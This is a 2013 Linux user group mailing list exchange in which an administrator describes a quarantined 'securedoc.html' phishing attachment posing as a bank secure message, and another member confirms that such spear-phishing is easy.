Yes, unfortunately it is this easy. On Dec 4, 2013, at 12:21 PM, Edmund Cramp <e...@motion-labs.com> wrote:
> A user received an email that purports to come from one of our customers with > the instructions: > > "Click the securedoc.html attachment to open (view) the secure message. For > best results, save the file first and open it from the saved location using a > Web browser." > > My email system, very sensibly stripped and quarantined the file, and stored > it with a couple of hundred of assorted New Order.zip and payroll report.xls > files in the quarantine directory. Opening the file with notepad shows it to > be mostly javascript with various references that make it appear to come from > the Bank of America. > > My immediate reaction was unprintable but hell, assuming that it's "real" and > that's not certain yet, these people want me to let users open any HTML web > page that floats into their inbox? > > This has got to be a gift from the gods if you are up to mischief - just > email everyone a securedoc.html file and they will open it and enter their > password ... which javascript (love that stuff) will promptly send to the web > site of your choice. > > Spearfishing is this easy? > > Edmund Cramp - google.com/+edmundcramp > -- > I am a drinker with writing problems. Brendan Behan > > > _______________________________________________ > General mailing list > General@brlug.net > http://brlug.net/mailman/listinfo/general_brlug.net --- Keith Stokes
_______________________________________________ General mailing list General@brlug.net http://brlug.net/mailman/listinfo/general_brlug.net